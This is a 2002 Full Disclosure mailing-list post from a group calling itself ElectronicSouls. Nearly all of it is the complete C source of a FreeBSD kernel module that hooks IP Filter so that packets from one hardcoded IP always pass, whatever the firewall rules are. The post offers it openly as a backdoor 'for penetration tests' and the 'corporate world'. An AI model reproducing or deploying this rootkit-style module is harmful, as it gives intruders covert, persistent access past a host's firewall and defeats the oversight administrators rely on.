Full Disclosure mailing list archives
[ElectronicSouls] - ipf backdoor
From: es () hush com
Date: Fri, 29 Nov 2002 13:30:36 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here is a backdoor you may find useful on your penetration tests; it forces ip filter to receive packets from a specified IP, no matter what the actual ipf rules are. Put it to good use in the corporate world. # cat ES-ipf0wn.c /* * ----------------------------- !DO NOT DISTRIBUTE! ----------------------------- * !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! * ----------------------------- !DO NOT DISTRIBUTE! ----------------------------- * * IPF0wn (C) KernelPanic & BrainStorm [ElectronicSouls] * Tested on: FreeBSD 3.4 * * Idea- BrainStorm / KernelPanic * Code- KernelPanic / BrainStorm * * this will get ipfilter to always accept packets from a special IP * * Brain's 1st LKM ! so b0w d0wn =) * * "BrainPanic, thats when kernelpanic and brainstorm get together and code ;)" * Greetz: * ElectronicSouls,ADM,anti.security.is,TESO,0x7f * * ----------------------------- !DO NOT DISTRIBUTE! ----------------------------- * !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! * ----------------------------- !DO NOT DISTRIBUTE! ----------------------------- */ #define OWNED "127.0.0.1" /* guess what ?? */ #include <sys/param.h> #include <sys/systm.h> #include <sys/malloc.h> #include <sys/mbuf.h> #include <sys/kernel.h> #include <sys/proc.h> #include <sys/socket.h> #include <sys/socketvar.h> #include <net/if.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_var.h> typedef struct ip ip_t; typedef struct mbuf mb_t; typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **)); static int s_load __P((struct module *, int, void *)); static u_int32_t inaton __P((const char *)); extern ipfr_t *fr_checkp; static ipfr_t myfr, *fr; static int s_load (struct module *module, int cmd, void *arg) { int s; switch(cmd) { case MOD_LOAD: s = splnet(); fr = fr_checkp; fr_checkp = myfr; splx(s); break; case MOD_UNLOAD: s = splnet(); fr_checkp = fr; splx(s); break; } return 0; } static moduledata_t s_mod_1 = { "ipfil_mod", s_load, 0 }; DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY); static int myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp) { if(ip->ip_src.s_addr == inaton(OWNED)) return 0; return(fr(ip, hlen, ifp, out, mp)); } static u_int32_t inaton(const char *str) { unsigned long l; unsigned int val; int i; l = 0; for(i=0; i < 4; i++) { l <<= 8; if(*str != '\0') { val = 0; while(*str != '\0' && *str != '.') { val *= 10; val += *str - '0'; str++; } l |= val; if(*str != '\0') str++; } } return(htonl(l)); } /* ps: Brain- check the handler ..*/ /* and dont give it anyone outside ES yet ;) im sure you dont anyway ..later bro */ # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Save the planet." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3n3JAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt5z0AnjvWtmx/V56T aOTVxtLNuXtdqsMvAJ9e7on7bCgiF13/4ob7sfRznOWQeg== =rUff -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - ipf backdoor es (Nov 29)